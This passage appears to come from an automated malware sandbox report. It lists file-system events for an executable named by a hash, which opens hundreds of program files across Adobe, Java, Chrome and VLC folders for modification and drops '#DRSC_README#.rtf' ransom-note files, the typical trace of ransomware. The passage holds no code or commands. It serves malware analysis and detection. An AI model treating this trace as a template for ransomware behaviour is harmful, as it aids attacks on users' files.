modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_download_pdf_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen-exit.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_close2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\management\jmxremote.access 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\de_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\es-419.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodbig.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-core.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_zh_CN.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\rmid.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-multitabs.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javaws.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\javafx.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app_1.0.300.v20140228-1829.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\cursors.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActions.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\cmm\PYCC.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview-hover.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_forward_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\PlayStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_hover.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adobe_logo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_download_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\klist.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\dropins\README.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\zh-TW.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\eclipse.inf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons_retina_thumb.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview_selected-hover.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluEmptyStateDCFiles_280x192.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\view.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_patterns_header.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\RestorePing.wm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_partialselected-default_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\bg_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaSansDemiBold.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\locale\jfluid-server_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_ru_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\sat_logo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\s_listview_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\AddressBook.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\.eclipseproduct 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lt_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\THIRDPARTYLICENSEREADME.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\com-sun-tools-visualvm-modules-startup.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files 